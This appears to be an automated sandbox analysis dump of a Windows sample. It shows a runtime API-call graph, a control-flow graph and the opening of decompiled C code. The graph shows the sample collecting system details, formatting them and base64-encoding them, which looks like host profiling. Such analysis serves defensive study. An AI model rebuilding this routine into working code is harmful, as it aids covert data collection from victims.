API calls 20387->20391 20390 106c4d 20388->20390 20393 106c35 InterlockedIncrement 20388->20393 20394 106c1b InterlockedDecrement 20388->20394 20389->20359 20668 106c5e 20390->20668 20391->20389 20393->20390 20394->20393 20395 106c26 20394->20395 20395->20393 20396 105de2 __getptd_noexit 66 API calls 20395->20396 20397 106c34 20396->20397 20397->20393 20399 107304 20398->20399 20400 107339 20398->20400 20399->20400 20401 107084 ___addlocaleref 8 API calls 20399->20401 20406 1073b1 20400->20406 20402 10731a 20401->20402 20402->20400 20409 107113 20402->20409 20667 10a5a5 LeaveCriticalSection 20406->20667 20408 1073b8 20408->20377 20410 107124 InterlockedDecrement 20409->20410 20411 1071a7 20409->20411 20412 107139 InterlockedDecrement 20410->20412 20413 10713c 20410->20413 20411->20400 20423 1071ac 20411->20423 20412->20413 20414 107146 InterlockedDecrement 20413->20414 20415 107149 20413->20415 20414->20415 20416 107153 InterlockedDecrement 20415->20416 20417 107156 20415->20417 20416->20417 20418 107160 InterlockedDecrement 20417->20418 20420 107163 20417->20420 20418->20420 20419 10717c InterlockedDecrement 20419->20420 20420->20419 20421 10718c InterlockedDecrement 20420->20421 20422 107197 InterlockedDecrement 20420->20422 20421->20420 20422->20411 20424 1071c3 20423->20424 20425 107230 20423->20425 20424->20425 20430 1071f7 20424->20430 20438 105de2 __getptd_noexit 66 API calls 20424->20438 20426 105de2 __getptd_noexit 66 API calls 20425->20426 20427 10727d 20425->20427 20428 107251 20426->20428 20440 1072a6 20427->20440 20493 10a6b1 20427->20493 20431 105de2 __getptd_noexit 66 API calls 20428->20431 20432 107218 20430->20432 20444 105de2 __getptd_noexit 66 API calls 20430->20444 20434 107264 20431->20434 20435 105de2 __getptd_noexit 66 API calls 20432->20435 20442 105de2 __getptd_noexit 66 API calls 20434->20442 20445 107225 20435->20445 20436 1072eb 20439 105de2 __getptd_noexit 66 API calls 20436->20439 20437 105de2 __getptd_noexit 66 API calls 20437->20440 20441 1071ec 20438->20441 20446 1072f1 20439->20446 20440->20436 20443 105de2 66 API calls __getptd_noexit 20440->20443 20453 10aa91 20441->20453 20448 107272 20442->20448 20443->20440 20449 10720d 20444->20449 20450 105de2 __getptd_noexit 66 API calls 20445->20450 20446->20400 20451 105de2 __getptd_noexit 66 API calls 20448->20451 20481 10aa28 20449->20481 20450->20425 20451->20427 20454 10aaa2 20453->20454 20480 10ab8b 20453->20480 20455 10aab3 20454->20455 20456 105de2 __getptd_noexit 66 API calls 20454->20456 20457 10aac5 20455->20457 20458 105de2 __getptd_noexit 66 API calls 20455->20458 20456->20455 20459 10aad7 20457->20459 20460 105de2 __getptd_noexit 66 API calls 20457->20460 20458->20457 20461 10aae9 20459->20461 20463 105de2 __getptd_noexit 66 API calls 20459->20463 20460->20459 20462 10aafb 20461->20462 20464 105de2 __getptd_noexit 66 API calls 20461->20464 20465 10ab0d 20462->20465 20466 105de2 __getptd_noexit 66 API calls 20462->20466 20463->20461 20464->20462 20467 10ab1f 20465->20467 20468 105de2 __getptd_noexit 66 API calls 20465->20468 20466->20465 20469 105de2 __getptd_noexit 66 API calls 20467->20469 20471 10ab31 20467->20471 20468->20467 20469->20471 20470 105de2 __getptd_noexit 66 API calls 20472 10ab43 20470->20472 20471->20470 20471->20472 20473 105de2 __getptd_noexit 66 API calls 20472->20473 20474 10ab55 20472->20474 20473->20474 20475 10ab67 20474->20475 20476 105de2 __getptd_noexit 66 API calls 20474->20476 20477 10ab79 20475->20477 20478 105de2 __getptd_noexit 66 API calls 20475->20478 20476->20475 20479 105de2 __getptd_noexit 66 API calls 20477->20479 20477->20480 20478->20477 20479->20480 20480->20430 20482 10aa35 20481->20482 20492 10aa8d 20481->20492 20483 10aa45 20482->20483 20484 105de2 __getptd_noexit 66 API calls 20482->20484 20485 10aa57 20483->20485 20486 105de2 __getptd_noexit 66 API calls 20483->20486 20484->20483 20487 10aa69 20485->20487 20488 105de2 __getptd_noexit 66 API calls 20485->20488 20486->20485 20489 10aa7b 20487->20489 20490 105de2 __getptd_noexit 66 API calls 20487->20490 20488->20487 20491 105de2 __getptd_noexit 66 API calls 20489->20491 20489->20492 20490->20489 20491->20492 20492->20432 20494 10a6c2 20493->20494 20495 10729b 20493->20495 20496 105de2 __getptd_noexit 66 API calls 20494->20496 20495->20437 20497 10a6ca 20496->20497 20498 105de2 __getptd_noexit 66 API calls 20497->20498 20499 10a6d2 20498->20499 20500 105de2 __getptd_noexit 66 API calls 20499->20500 20501 10a6da 20500->20501 20502 105de2 __getptd_noexit 66 API calls 20501->20502 20503 10a6e2 20502->20503 20504 105de2 __getptd_noexit 66 API calls 20503->20504 20505 10a6ea 20504->20505 20506 105de2 __getptd_noexit 66 API calls 20505->20506 20507 10a6f2 20506->20507 20508 105de2 __getptd_noexit 66 API calls 20507->20508 20509 10a6f9 20508->20509 20510 105de2 __getptd_noexit 66 API calls 20509->20510 20511 10a701 20510->20511 20512 105de2 __getptd_noexit 66 API calls 20511->20512 20513 10a709 20512->20513 20514 105de2 __getptd_noexit 66 API calls 20513->20514 20515 10a711 20514->20515 20516 105de2 __getptd_noexit 66 API calls 20515->20516 20517 10a719 20516->20517 20518 105de2 __getptd_noexit 66 API calls 20517->20518 20519 10a721 20518->20519 20520 105de2 __getptd_noexit 66 API calls 20519->20520 20521 10a729 20520->20521 20522 105de2 __getptd_noexit 66 API calls 20521->20522 20523 10a731 20522->20523 20524 105de2 __getptd_noexit 66 API calls 20523->20524 20525 10a739 20524->20525 20526 105de2 __getptd_noexit 66 API calls 20525->20526 20527 10a741 20526->20527 20528 105de2 __getptd_noexit 66 API calls 20527->20528 20529 10a74c 20528->20529 20530 105de2 __getptd_noexit 66 API calls 20529->20530 20531 10a754 20530->20531 20532 105de2 __getptd_noexit 66 API calls 20531->20532 20533 10a75c 20532->20533 20534 105de2 __getptd_noexit 66 API calls 20533->20534 20535 10a764 20534->20535 20536 105de2 __getptd_noexit 66 API calls 20535->20536 20537 10a76c 20536->20537 20538 105de2 __getptd_noexit 66 API calls 20537->20538 20539 10a774 20538->20539 20540 105de2 __getptd_noexit 66 API calls 20539->20540 20541 10a77c 20540->20541 20542 105de2 __getptd_noexit 66 API calls 20541->20542 20543 10a784 20542->20543 20544 105de2 __getptd_noexit 66 API calls 20543->20544 20545 10a78c 20544->20545 20546 105de2 __getptd_noexit 66 API calls 20545->20546 20547 10a794 20546->20547 20548 105de2 __getptd_noexit 66 API calls 20547->20548 20549 10a79c 20548->20549 20550 105de2 __getptd_noexit 66 API calls 20549->20550 20551 10a7a4 20550->20551 20552 105de2 __getptd_noexit 66 API calls 20551->20552 20553 10a7ac 20552->20553 20554 105de2 __getptd_noexit 66 API calls 20553->20554 20555 10a7b4 20554->20555 20556 105de2 __getptd_noexit 66 API calls 20555->20556 20557 10a7bc 20556->20557 20558 105de2 __getptd_noexit 66 API calls 20557->20558 20559 10a7c4 20558->20559 20560 105de2 __getptd_noexit 66 API calls 20559->20560 20561 10a7d2 20560->20561 20562 105de2 __getptd_noexit 66 API calls 20561->20562 20563 10a7dd 20562->20563 20564 105de2 __getptd_noexit 66 API calls 20563->20564 20565 10a7e8 20564->20565 20566 105de2 __getptd_noexit 66 API calls 20565->20566 20567 10a7f3 20566->20567 20568 105de2 __getptd_noexit 66 API calls 20567->20568 20569 10a7fe 20568->20569 20570 105de2 __getptd_noexit 66 API calls 20569->20570 20571 10a809 20570->20571 20572 105de2 __getptd_noexit 66 API calls 20571->20572 20573 10a814 20572->20573 20574 105de2 __getptd_noexit 66 API calls 20573->20574 20575 10a81f 20574->20575 20576 105de2 __getptd_noexit 66 API calls 20575->20576 20577 10a82a 20576->20577 20578 105de2 __getptd_noexit 66 API calls 20577->20578 20579 10a835 20578->20579 20580 105de2 __getptd_noexit 66 API calls 20579->20580 20581 10a840 20580->20581 20582 105de2 __getptd_noexit 66 API calls 20581->20582 20583 10a84b 20582->20583 20584 105de2 __getptd_noexit 66 API calls 20583->20584 20585 10a856 20584->20585 20586 105de2 __getptd_noexit 66 API calls 20585->20586 20587 10a861 20586->20587 20588 105de2 __getptd_noexit 66 API calls 20587->20588 20589 10a86c 20588->20589 20590 105de2 __getptd_noexit 66 API calls 20589->20590 20591 10a877 20590->20591 20592 105de2 __getptd_noexit 66 API calls 20591->20592 20593 10a885 20592->20593 20594 105de2 __getptd_noexit 66 API calls 20593->20594 20595 10a890 20594->20595 20596 105de2 __getptd_noexit 66 API calls 20595->20596 20597 10a89b 20596->20597 20598 105de2 __getptd_noexit 66 API calls 20597->20598 20599 10a8a6 20598->20599 20600 105de2 __getptd_noexit 66 API calls 20599->20600 20601 10a8b1 20600->20601 20602 105de2 __getptd_noexit 66 API calls 20601->20602 20603 10a8bc 20602->20603 20604 105de2 __getptd_noexit 66 API calls 20603->20604 20605 10a8c7 20604->20605 20606 105de2 __getptd_noexit 66 API calls 20605->20606 20607 10a8d2 20606->20607 20608 105de2 __getptd_noexit 66 API calls 20607->20608 20609 10a8dd 20608->20609 20610 105de2 __getptd_noexit 66 API calls 20609->20610 20611 10a8e8 20610->20611 20612 105de2 __getptd_noexit 66 API calls 20611->20612 20613 10a8f3 20612->20613 20614 105de2 __getptd_noexit 66 API calls 20613->20614 20615 10a8fe 20614->20615 20616 105de2 __getptd_noexit 66 API calls 20615->20616 20617 10a909 20616->20617 20618 105de2 __getptd_noexit 66 API calls 20617->20618 20619 10a914 20618->20619 20620 105de2 __getptd_noexit 66 API calls 20619->20620 20621 10a91f 20620->20621 20622 105de2 __getptd_noexit 66 API calls 20621->20622 20623 10a92a 20622->20623 20624 105de2 __getptd_noexit 66 API calls 20623->20624 20625 10a938 20624->20625 20626 105de2 __getptd_noexit 66 API calls 20625->20626 20627 10a943 20626->20627 20628 105de2 __getptd_noexit 66 API calls 20627->20628 20629 10a94e 20628->20629 20630 105de2 __getptd_noexit 66 API calls 20629->20630 20631 10a959 20630->20631 20632 105de2 __getptd_noexit 66 API calls 20631->20632 20633 10a964 20632->20633 20634 105de2 __getptd_noexit 66 API calls 20633->20634 20635 10a96f 20634->20635 20636 105de2 __getptd_noexit 66 API calls 20635->20636 20637 10a97a 20636->20637 20638 105de2 __getptd_noexit 66 API calls 20637->20638 20639 10a985 20638->20639 20640 105de2 __getptd_noexit 66 API calls 20639->20640 20641 10a990 20640->20641 20642 105de2 __getptd_noexit 66 API calls 20641->20642 20643 10a99b 20642->20643 20644 105de2 __getptd_noexit 66 API calls 20643->20644 20645 10a9a6 20644->20645 20646 105de2 __getptd_noexit 66 API calls 20645->20646 20647 10a9b1 20646->20647 20648 105de2 __getptd_noexit 66 API calls 20647->20648 20649 10a9bc 20648->20649 20650 105de2 __getptd_noexit 66 API calls 20649->20650 20651 10a9c7 20650->20651 20652 105de2 __getptd_noexit 66 API calls 20651->20652 20653 10a9d2 20652->20653 20654 105de2 __getptd_noexit 66 API calls 20653->20654 20655 10a9dd 20654->20655 20656 105de2 __getptd_noexit 66 API calls 20655->20656 20657 10a9eb 20656->20657 20658 105de2 __getptd_noexit 66 API calls 20657->20658 20659 10a9f6 20658->20659 20660 105de2 __getptd_noexit 66 API calls 20659->20660 20661 10aa01 20660->20661 20662 105de2 __getptd_noexit 66 API calls 20661->20662 20663 10aa0c 20662->20663 20664 105de2 __getptd_noexit 66 API calls 20663->20664 20665 10aa17 20664->20665 20666 105de2 __getptd_noexit 66 API calls 20665->20666 20666->20495 20667->20408 20671 10a5a5 LeaveCriticalSection 20668->20671 20670 106c65 20670->20387 20671->20670 20673 106ed8 ___lock_fhandle 20672->20673 20674 10756d __getptd 66 API calls 20673->20674 20675 106ee1 20674->20675 20676 106bc3 _LocaleUpdate::_LocaleUpdate 68 API calls 20675->20676 20677 106eeb 20676->20677 20703 106c67 20677->20703 20680 10914f __malloc_crt 66 API calls 20681 106f0c 20680->20681 20682 10702b ___lock_fhandle 20681->20682 20710 106ce3 20681->20710 20682->20345 20685 106f3c InterlockedDecrement 20687 106f4c 20685->20687 20688 106f5d InterlockedIncrement 20685->20688 20686 107038 20686->20682 20689 10704b 20686->20689 20691 105de2 __getptd_noexit 66 API calls 20686->20691 20687->20688 20693 105de2 __getptd_noexit 66 API calls 20687->20693 20688->20682 20690 106f73 20688->20690 20692 107a0d __mbspbrk_l 66 API calls 20689->20692 20690->20682 20694 10a67e __lock 66 API calls 20690->20694 20691->20689 20692->20682 20695 106f5c 20693->20695 20697 106f87 InterlockedDecrement 20694->20697 20695->20688 20698 107003 20697->20698 20699 107016 InterlockedIncrement 20697->20699 20698->20699 20701 105de2 __getptd_noexit 66 API calls 20698->20701 20720 10702d 20699->20720 20702 107015 20701->20702 20702->20699 20704 1059f5 _LocaleUpdate::_LocaleUpdate 76 API calls 20703->20704 20705 106c7b 20704->20705 20706 106ca4 20705->20706 20707 106c86 GetOEMCP 20705->20707 20708 106ca9 GetACP 20706->20708 20709 106c96 20706->20709 20707->20709 20708->20709 20709->20680 20709->20682 20711 106c67 getSystemCP 78 API calls 20710->20711 20712 106d03 20711->20712 20713 106d0e setSBCS 20712->20713 20716 106d52 IsValidCodePage 20712->20716 20719 106d77 _memset __setmbcp_nolock 20712->20719 20714 1059e6 __NMSG_WRITE 5 API calls 20713->20714 20715 106eca 20714->20715 20715->20685 20715->20686 20716->20713 20717 106d64 GetCPInfo 20716->20717 20717->20713 20717->20719 20723 106a33 GetCPInfo 20719->20723 20784 10a5a5 LeaveCriticalSection 20720->20784 20722 107034 20722->20682 20724 106a67 _memset 20723->20724 20732 106b1b 20723->20732 20733 10965a 20724->20733 20728 1059e6 __NMSG_WRITE 5 API calls 20730 106bc1 20728->20730 20730->20719 20731 108008 ___crtLCMapStringA 82 API calls 20731->20732 20732->20728 20734 1059f5 _LocaleUpdate::_LocaleUpdate 76 API calls 20733->20734 20735 10966d 20734->20735 20743 109573 20735->20743 20738 108008 20739 1059f5 _LocaleUpdate::_LocaleUpdate 76 API calls 20738->20739 20740 10801b 20739->20740 20760 107e21 20740->20760 20744 109591 20743->20744 20745 10959c MultiByteToWideChar 20743->20745 20744->20745 20746 1095c9 20745->20746 20755 1095c5 20745->20755 20749 105e1c _malloc 66 API calls 20746->20749 20754 1095de _memset __crtLCMapStringA_stat 20746->20754 20747 1059e6 __NMSG_WRITE 5 API calls 20748 106ad6 20747->20748 20748->20738 20749->20754 20750 109617 MultiByteToWideChar 20751 10962d GetStringTypeW 20750->20751 20752 10963e 20750->20752 20751->20752 20756 107e01 20752->20756 20754->20750 20754->20755 20755->20747 20757 107e0d 20756->20757 20758 107e1e 20756->20758 20757->20758 20759 105de2 __getptd_noexit 66 API calls 20757->20759 20758->20755 20759->20758 20761 107e3f MultiByteToWideChar 20760->20761 20763 107e9d 20761->20763 20767 107ea4 20761->20767 20764 1059e6 __NMSG_WRITE 5 API calls 20763->20764 20766 106af6 20764->20766 20765 107ef1 MultiByteToWideChar 20768 107fe9 20765->20768 20769 107f0a LCMapStringW 20765->20769 20766->20731 20770 105e1c _malloc 66 API calls 20767->20770 20774 107ebd __crtLCMapStringA_stat 20767->20774 20772 107e01 __freea 66 API calls 20768->20772 20769->20768 20771 107f29 20769->20771 20770->20774 20773 107f33 20771->20773 20777 107f5c 20771->20777 20772->20763 20773->20768 20775 107f47 LCMapStringW 20773->20775 20774->20763 20774->20765 20775->20768 20776 107fab LCMapStringW 20778 107fc1 WideCharToMultiByte 20776->20778 20779 107fe3 20776->20779 20780 107f77 __crtLCMapStringA_stat 20777->20780 20781 105e1c _malloc 66 API calls 20777->20781 20778->20779 20782 107e01 __freea 66 API calls 20779->20782 20780->20768 20780->20776 20781->20780 20782->20768 20784->20722 20786 10d3a2 20785->20786 20788 10d3a9 20785->20788 20786->20788 20791 10d3c7 20786->20791 20787 107a0d __mbspbrk_l 66 API calls 20789 10d3ae 20787->20789 20788->20787 20790 1079bb __mbspbrk_l 11 API calls 20789->20790 20792 10d3b8 20790->20792 20791->20792 20793 107a0d __mbspbrk_l 66 API calls 20791->20793 20792->20010 20793->20789 20795 10b9a1 EncodePointer 20794->20795 20795->20795 20796 10b9bb 20795->20796 20796->20023 20800 106201 20797->20800 20799 10624a 20799->20025 20801 10620d ___lock_fhandle 20800->20801 20808 10844d 20801->20808 20807 10622e ___lock_fhandle 20807->20799 20809 10a67e __lock 66 API calls 20808->20809 20810 106212 20809->20810 20811 10611a DecodePointer DecodePointer 20810->20811 20812 106148 20811->20812 20813 1061c9 20811->20813 20812->20813 20825 10922e 20812->20825 20822 106237 20813->20822 20815 10615a 20816 1061ac EncodePointer EncodePointer 20815->20816 20818 10617e 20815->20818 20832 1091e0 20815->20832 20816->20813 20818->20813 20819 1091e0 __realloc_crt 70 API calls 20818->20819 20821 10619a EncodePointer 20818->20821 20820 106194 20819->20820 20820->20813 20820->20821 20821->20816 20858 108456 20822->20858 20826 109239 20825->20826 20827 10924e HeapSize 20825->20827 20828 107a0d __mbspbrk_l 66 API calls 20826->20828 20827->20815 20829 10923e 20828->20829 20830 1079bb __mbspbrk_l 11 API calls 20829->20830 20831 109249 20830->20831 20831->20815 20835 1091e9 20832->20835 20834 109228 20834->20818 20835->20834 20836 109209 Sleep 20835->20836 20837 1093ab 20835->20837 20836->20835 20838 1093c1 20837->20838 20839 1093b6 20837->20839 20841 1093c9 20838->20841 20849 1093d6 20838->20849 20840 105e1c _malloc 66 API calls 20839->20840 20842 1093be 20840->20842 20843 105de2 __getptd_noexit 66 API calls 20841->20843 20842->20835 20857 1093d1 __dosmaperr 20843->20857 20844 10940e 20846 108912 _malloc DecodePointer 20844->20846 20845 1093de HeapReAlloc 20845->20849 20845->20857 20847 109414 20846->20847 20850 107a0d __mbspbrk_l 66 API calls 20847->20850 20848 10943e 20852 107a0d __mbspbrk_l 66 API calls 20848->20852 20849->20844 20849->20845 20849->20848 20851 108912 _malloc DecodePointer 20849->20851 20854 109426 20849->20854 20850->20857 20851->20849 20853 109443 GetLastError 20852->20853 20853->20857 20855 107a0d __mbspbrk_l 66 API calls 20854->20855 20856 10942b GetLastError 20855->20856 20856->20857 20857->20835 20861 10a5a5 LeaveCriticalSection 20858->20861 20860 10623c 20860->20807 20861->20860 20863 f4a70 20862->20863 20864 f4a7b GetCurrentThreadId 20863->20864 20866 f4a96 LoadLibraryA 20863->20866 20893 1065fc 20864->20893 20867 1054f5 20866->20867 20927 104820 20867->20927 20869 105667 20870 105679 GetProcessHeap HeapFree 20869->20870 20871 10568a InterlockedPushEntrySList 20869->20871 20870->20036 20871->20036 20939 f9e80 20872->20939 20874 f9fd8 FreeLibrary 20882 f4ba0 EnterCriticalSection 20874->20882 20875 f9f45 MsgWaitForMultipleObjects 20876 f9f5e MessageBoxA 20875->20876 20877 f9f2e 20875->20877 20876->20877 20877->20874 20877->20875 20878 f9f7d CloseHandle 20877->20878 20879 f9fc7 MessageBeep 20877->20879 20880 f9fa0 GetMessageA 20877->20880 20881 f9e80 80 API calls 20877->20881 20878->20877 20879->20877 20880->20877 20880->20879 20881->20877 20883 f4bed 20882->20883 20886 f4c02 20882->20886 20884 f4bf2 DestroyWindow 20883->20884 20883->20886 20884->20886 20885 f4c28 LeaveCriticalSection 20885->20043 20886->20885 20887 f4c14 moneypunct 20886->20887 20888 105de2 __getptd_noexit 66 API calls 20886->20888 20887->20885 20888->20887 20891 f470e moneypunct 20889->20891 20890 f47b3 20890->19931 20891->20890 20892 f47a2 DeleteCriticalSection 20891->20892 20892->20890 20896 106606 20893->20896 20894 105e1c _malloc 66 API calls 20894->20896 20895 106620 20895->20866 20896->20894 20896->20895 20897 108912 _malloc DecodePointer 20896->20897 20901 106622 std::exception::exception 20896->20901 20897->20896 20898 106660 20905 109c1e 20898->20905 20901->20898 20903 10623d __cinit 76 API calls 20901->20903 20903->20898 20904 10667b 20911 109bb7 20905->20911 20908 109c43 20909 109c78 RaiseException 20908->20909 20910 109c6c 20908->20910 20909->20904 20910->20909 20912 109bc7 20911->20912 20915 10666a 20911->20915 20917 109b72 20912->20917 20915->20908 20918 109b85 20917->20918 20919 109b7d 20917->20919 20918->20915 20921 109b32 20918->20921 20920 105de2 __getptd_noexit 66 API calls 20919->20920 20920->20918 20922 109b40 _strlen 20921->20922 20925 109b65 20921->20925 20923 105e1c _malloc 66 API calls 20922->20923 20924 109b52 20923->20924 20924->20925 20926 10d394 _strcpy_s 66 API calls 20924->20926 20925->20915 20926->20925 20932 1047e0 20927->20932 20930 104f40 20930->20869 20931 105217 LdrInitializeThunk 20931->20869 20935 104660 20932->20935 20934 1047e8 20934->20930 20934->20931 20936 104678 GetPEB 20935->20936 20937 10466f 20935->20937 20938 104690 20936->20938 20937->20934 20938->20934 20940 f9e89 MessageBoxA 20939->20940 20941 f9ea5 20939->20941 20940->20877 20942 1065fc 77 API calls 20941->20942 20943 f9eac CreateThread 20942->20943 20944 f9eee 20943->20944 20945 f9ed4 MessageBoxA 20943->20945 20944->20877 20945->20877 20949 10854d 20946->20949 20948 1086b4 20950 108559 ___lock_fhandle 20949->20950 20951 10a67e __lock 61 API calls 20950->20951 20952 108560 20951->20952 20953 10858b DecodePointer 20952->20953 20959 10860a 20952->20959 20955 1085a2 DecodePointer 20953->20955 20953->20959 20969 1085b5 20955->20969 20957 108687 ___lock_fhandle 20957->20948 20972 108678 20959->20972 20960 10866f 20962 108435 _fast_error_exit 3 API calls 20960->20962 20963 108678 20962->20963 20964 108685 20963->20964 20977 10a5a5 LeaveCriticalSection 20963->20977 20964->20948 20965 1085cc DecodePointer 20971 1073bd RtlEncodePointer 20965->20971 20968 1085db DecodePointer DecodePointer 20968->20969 20969->20959 20969->20965 20969->20968 20970 1073bd RtlEncodePointer 20969->20970 20970->20969 20971->20969 20973 108658 20972->20973 20974 10867e 20972->20974 20973->20957 20976 10a5a5 LeaveCriticalSection 20973->20976 20978 10a5a5 LeaveCriticalSection 20974->20978 20976->20960 20977->20964 20978->20973 20979 1073bd RtlEncodePointer

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 0 4004ba0-4004bbc CoInitialize 1 40056f0-40056fc CoUninitialize 0->1 2 4004bc2-4004bff call 4007b70 SetEvent 0->2 2->1 6 4004c05-4004c0e 2->6 7 4004c10-4004c21 WaitForSingleObject 6->7 8 4004c28-4004c84 VirtualAlloc * 3 6->8 7->8 11 4004c23 7->11 9 4004c8a-4004c8e 8->9 10 40056eb 8->10 9->10 12 4004c94-4004c98 9->12 10->1 11->1 12->10 13 4004c9e-4004cbd 12->13 15 40052a2-40052b2 13->15 16 4004cc3-4004cd0 13->16 17 40052b4-40052be 15->17 18 4005325-400534e call 4008370 15->18 19 4004cd6-4004ce3 16->19 20 400529d 16->20 17->18 21 40052c0-40052d1 17->21 34 4005354-400537f lstrlenA * 2 18->34 35 40056b8-40056e5 VirtualFree * 3 18->35 23 4004ce5-4004d17 call 4006170 * 2 call 40060c0 19->23 24 4004d1c-4004d29 19->24 21->18 25 40052d3-40052dd 21->25 23->20 27 4004d62-4004d6f 24->27 28 4004d2b-4004d5d call 4006170 * 2 call 40060c0 24->28 25->18 31 40052df-4005322 call 4007b70 25->31 32 4004d71-4004da3 call 4006170 * 2 call 40060c0 27->32 33 4004da8-4004db5 27->33 28->20 31->18 32->20 42 4004db7-4004dd8 GetCurrentThreadId call 4006170 33->42 43 4004e2c-4004e39 33->43 34->35 41 4005385-40053ca wsprintfA CryptBinaryToStringA 34->41 35->10 41->35 48 40053d0-400544e MultiByteToWideChar call 40017d0 41->48 61 4004dda-4004dfb call 4006170 call 40060c0 42->61 62 4004dfd-4004e04 42->62 49 4004e72-4004e7f 43->49 50 4004e3b-4004e6d call 4006170 * 2 call 40060c0 43->50 79 4005454-400545e 48->79 80 400569b-40056a2 48->80 55 4004ee1-4004eee 49->55 56 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 49->56 50->20 68 4004f40-4004f4d 55->68 69 4004ef0-4004f13 GlobalMemoryStatus call 4006170 55->69 77 4004eb9-4004edc call 4006170 call 40060c0 56->77 76 4004e27 61->76 75 4004e06-4004e24 call 4006170 call 40060c0 62->75 62->76 73 4004f86-4004f93 68->73 74 4004f4f-4004f81 call 4006170 * 2 call 40060c0 68->74 82 4004f18-4004f3b call 4006170 call 40060c0 69->82 89 4004fd0-4004fdd 73->89 90 4004f95-4004fcb call 4006170 * 2 call 40060c0 73->90 74->20 75->76 76->20 77->20 92 4005470-4005477 79->92 93 4005460-400546a 79->93 80->35 91 40056a4-40056b2 VirtualFree 80->91 82->20 99 4005032-400503f 89->99 100 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 89->100 90->20 91->35 94 400551f-4005526 92->94 96 400547d-40054af VirtualFree 92->96 93->92 93->94 94->80 113 400552c-4005540 EnterCriticalSection 94->113 107 40054c0-40054c7 96->107 115 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 99->115 116 4005096-40050a3 99->116 100->20 107->94 119 40054c9-40054f5 call 40017d0 107->119 125 4005542-4005573 VirtualAlloc call 4007b70 113->125 126 400558c-40055c1 VirtualAlloc 113->126 115->20 120 4005104-4005111 116->120 121 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 116->121 145 40054fa-400550d 119->145 139 4005172-400517f 120->139 140 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 120->140 121->20 151 4005578-4005587 125->151 129 40055c7-40055d8 GetTickCount 126->129 130 400568e-4005695 LeaveCriticalSection 126->130 141 40055da-400561a call 4007b70 * 2 129->141 142 400561c-4005659 call 4007b70 * 2 129->142 130->80 146 40051e0-40051ed 139->146 147 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 139->147 140->20 193 400565c-400568b VirtualFree 141->193 142->193 158 400551b 145->158 159 400550f-4005519 145->159 163 400523f-400524c 146->163 164 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 146->164 147->20 151->130 158->94 159->158 170 400551d 159->170 163->20 168 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 163->168 164->20 168->20 170->107 193->130
                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04004BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                                          				CHAR* _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                                                                                                                          				CHAR* _v424;
                                                                                                                                                                                                                                                                                          				int _v428;
                                                                                                                                                                                                                                                                                          				void* _v432;
                                                                                                                                                                                                                                                                                          				long _v436;
                                                                                                                                                                                                                                                                                          				short _v948;
                                                                                                                                                                                                                                                                                          				void* _v952;
                                                                                                                                                                                                                                                                                          				void* _v956;
                                                                                                                                                                                                                                                                                          				void* _v960;
                                                                                                                                                                                                                                                                                          				void* _v964;
                                                                                                                                                                                                                                                                                          				long _v968;
                                                                                                                                                                                                                                                                                          				void* _t306;
                                                                                                                                                                                                                                                                                          				void* _t307;
                                                                                                                                                                                                                                                                                          				void* _t308;
                                                                                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                                                                                          				int _t318;
                                                                                                                                                                                                                                                                                          				long _t328;
                                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                                          				void* _t351;
                                                                                                                                                                                                                                                                                          				long _t358;
                                                                                                                                                                                                                                                                                          				void* _t637;
                                                                                                                                                                                                                                                                                          				void* _t638;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                                          					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                                          					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                                          					_v40 = 0xea60;
